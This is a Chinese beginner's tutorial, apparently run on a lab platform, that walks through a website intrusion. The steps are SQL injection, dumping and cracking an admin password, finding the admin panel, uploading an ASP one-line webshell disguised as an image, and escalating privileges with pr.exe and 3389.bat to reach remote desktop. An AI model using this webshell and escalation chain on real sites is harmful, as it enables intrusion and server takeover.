常见脚本网站入侵教程

首先,大家先跟着我一起背诵三字经。

这是一篇在脚本小子的世界里流传的比较广的渗透三字经,也是拿下一个网站的基本思路。

何为脚本小子?一般来说,我们通常会把以“黑客”自居并沾沾自喜的初学者叫做脚本小子。脚本小子不像真正的黑客那样发现系统漏洞,他们通常使用别人开发的程序来恶意破坏他人系统。

通常的刻板印象为一位没有专科经验的少年,破坏无辜网站企图使得他的朋友感到惊讶。他们常常从某些网站上复制脚本代码,然后到处粘贴,却并不一定明白他们的方法与原理。他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好,但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正的黑客来说是必须具备的素质。

今天,小白带你入门脚本小子。文章开头一起朗读的三字经文不知道大家还有没有印象。一般来说,最简单的渗透流程就来自这三字经:找注入-爆账号-找后台-传小马-拿权限。其中,这个流程的每一个阶段都有代表性的利用工具,先提前和大家介绍一下。

0x01 找注入 && 0x02 爆账号

工具:啊D注入工具、椰树、Pangolin(穿山甲)、havij(胡萝卜)

0x03 找后台

工具:御剑后台扫描、wwwscan扫描器

0x04 传小马

工具:pr提权工具、巴西烤肉提权工具

先不讲工具的原理这些废话,下面开始直接带你渗透一个网站。

由于小白手上没有对应的实验环境,转战i春秋,直接利用i春秋网站上提供的环境为大家来演示。

http://www.ichunqiu.com/racing

演示开始

Setup 1 找注入

打开桌面上的火狐浏览器,出现如下图的页面

什么都不要想,直接上啊D注入工具

成功找到注入点,如下图所示。

Setup2 爆账号

右键找到的注入点-注入检测

点击右上角的检测开始注入检测

最后得到网站的某个账号,用户名是linhai,密码为d7e15730ef9708c0。一般来说,数据库存放的密码应该是经过md5加密过的,怎么破?别慌!

解密MD5网站: http://www.dmd5.com/

解密md5后得到密码值为linhai19760812

Setup3 找后台

此步骤为找到网站的管理后台。来人啊,上工具。

打开后开始扫描

接下来,访问扫描到的后台地址,登陆。

地址:http://www.test.ichunqiu/admin/login.asp

直接登陆到网站的后台,到这里,是不是内心还伴随着一点小小的心动呢?

Setup4 传小马

由于是asp的站点,确定需要的是asp一句话木马,代码为

<%eval request(“x”)%>,密码为x

小白试了很多的上传点,比如这里:

还有这里

这里

这里

但是!!!功夫不负有心人,还是让我找到了一个上传点。

于是乎新建一个txt文档,写上asp一句话<%eval request(“x”)%>,密码是x。并且把文件类型改成图片。也不要只写一行代码,不大不小,100行差不多。

然后上传

接下来的思路就是利用网站的数据库功能把我们上传的文件后缀由jpg改成asp

然后,拿出我们的菜刀,连接刚我们复制到根目录的xbk.asp文件(木马)

地址是:http://www.test.ichunqiu/xbk.asp,密码是x。

在空白处 右键-添加 ,输入木马的地址和网站

Setup5 拿权限

右键木马的地址,选择 虚拟终端

输入任意命令,发现没有权限,访问被拒绝

接下切换到回收站目录下,回收站是几个有限拥有执行权限的目录。

分别找到我们的提权三件套:cmd.exe、pr.exe、3389.bat

接着,将三件套上传到回收站目录下面,如下图所示。

接下来,进入我们上传的cmd.exe的虚拟终端,执行我们的提权三件套。

执行完成之后,打远程连接,进入服务器。

至此,一个完整的渗透过程到此结束。

(0)

相关推荐

  • jmeter压测学习48- BadBoy录制web网站登录页面脚本

    前言 web网站的登录通常会发多个请求,对于初学者不确定填写哪些请求的可以使用 BadBoy 录制在页面上的操作,自动记录操作后的请求. 录制完成后可以导出 jmeter 脚本,在 jmeter 上再 ...

  • 如何把浏览器利用到极致

    帅帅的剪辑师 帅帅的剪辑师 2021-10-25 各行各业都有自己专业的软件工具 但是无论在哪行工作 都离不开一个软件:网页浏览器 今天我给大家分享一下我用的浏览器 和使用方法技巧 一.用哪个浏览器? ...

  • 谷歌站长工具傻瓜式教学

    所有原创转载请注明作者:Mike外贸说.来源及原文链接 摘取自我的群分享 再讲一下谷歌站长工具的使用 不会的自己这次注意看 首先你得有谷歌账号 也就是谷歌邮箱gmail 下面哪行的意思是说 这个谷歌邮 ...

  • 常用的网站入侵方法!网络安全入门教程

    近年来,随着社会的发展,网络安全问题已经成为全球经济发展最热点话题之一,也是客户最头疼的问题.网站被入侵,打开时跳转到其他垃圾网站,导致用户信息泄露,给企业造成严重影响,已经成为屡见不鲜的事情,那么网 ...

  • 常见的网站域名解析错误的方法

    很多网站用户在搭建的使用过程中,偶尔会遇到过域名解析错误的情况.本地一直无法访问或者是被强制跳转到其他网页上的情况,很多客户不知道如何处理,就自己乱尝试重新解析或者乱操作一通.而后还是无用功,比如近期 ...

  • Flutter Web网站搭建教程

    小白带你学编程 前天 作者 |  i校长 地址 |  mp.weixin.qq.com/s/VhtIcuBaSGEHcuiG95myeg 简述 曾几何时,你有没有一个搭个人网站的冲动,我这个想法在我第 ...

  • 自动采集文章后SEO加工并自动发布到网站详细教程

    简数采集平台支持自动采集文章,采集完成后进行SEO处理,对提高文章的收录和网站权重有非常重要的作用,并自动或定时发布到相应的一个或多个网站,实现文章搜索采集.SEO内容优化.发布网站全流程的自动化,减 ...

  • 【C4D教程】一个非常实用的C4D建模必备工具脚本合集教程

    136:20[C4D教程]一个非常实用的C4D建模必备工具脚本合集教程 375 202

  • 3Dmax脚本语言基础教程

    212:333Dmax脚本语言基础教程 52-12

  • 做自媒体的神仙网站 文案 教程 视频 音乐 图片素材 应有尽有

    做自媒体的神仙网站 文案 教程 视频 音乐 图片素材 应有尽有

  • 自定义网站搜索教程

    点击查看:站源导入教程 1.基本原理与参数 自定义站源规则,说白了就是APP直接请求所填的搜索网址,得到返回的 html 后,根据对应标签来定位,获取指定内容包括: text(也就是文字),href( ...

  • 网络推广中常见的网站建设细节中有哪些重点值得网络推广专员重视?

    通常在网络推广运营中最初的网站建设中有很多开发细节和重点值得引起站长的注意,通过这些重点开发细节可以为后续的网站优化运营奠定良好的基础,有利于后期的长久型网站运营优化,那么这些网站建设开发细节有哪些需 ...